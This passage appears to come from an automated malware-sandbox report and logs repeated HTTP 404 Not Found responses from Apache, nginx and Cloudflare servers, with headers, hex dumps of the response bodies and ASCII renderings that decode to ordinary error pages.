0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:23 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:26 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 03 Jul 2024 15:45:45 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XFrXUQcFDDEiqb72IIX6SrlFe6lJzAA3y42PLVBB13qTJE17jWIDkCN%2FR%2Fs%2B28FN6pv3b0Eu1g0RD0JPfS8Dp3oDmJppFcRyROYAO6%2F3OA9YyrMYts3YDF7utPMW5aV4PiU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d80122accd9e17-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 03 Jul 2024 15:45:48 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZHcX112AokBwQdDEHKMaPkfF7gEUIi5z68v0aWSVGm9x9ZmoaSMKuuxK7p%2B%2F%2BX9VkxsGrJUXtDAY%2Fndyx8hn%2FXvZdDBN4UId9%2Fq2tYe%2BzlDhnRe7dhw%2BqTe%2BEJLOkS%2FNZ8O"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d801327fc78c2f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 03 Jul 2024 15:45:50 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZjArDonv2pTcI0hM0k0wREXanriOIzukuI%2FrN1I9O1lkIS%2FV1c8dp25Q8G96B08H9n9xe0DikIzMvdACYt3yj6uJyWHcHPsvuhMojXYyM2MhgBtGjd1BJNLN0u9gK4Z84euI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d801426eb843f3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:45:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 03 Jul 2024 15:45:53 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4vWFpWTfdjtGMBArT2pMmuXCyYhpQvxVmlwJcSJPG33KFzDIUm4xeRsWwzfio0JhhUGQq%2FBiMekIj2hpzm7n7EIZbB59Z3F2HJn%2Bdjp6xRnKcV%2FhoHx%2FMSXbTk8a3bgrLDMI"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d801524d917271-EWRalt-svc: h3=":443"; ma=86400Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 15:45:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 15:46:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 15:46:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 15:46:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:12 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:14 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 03 Jul 2024 15:46:17 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 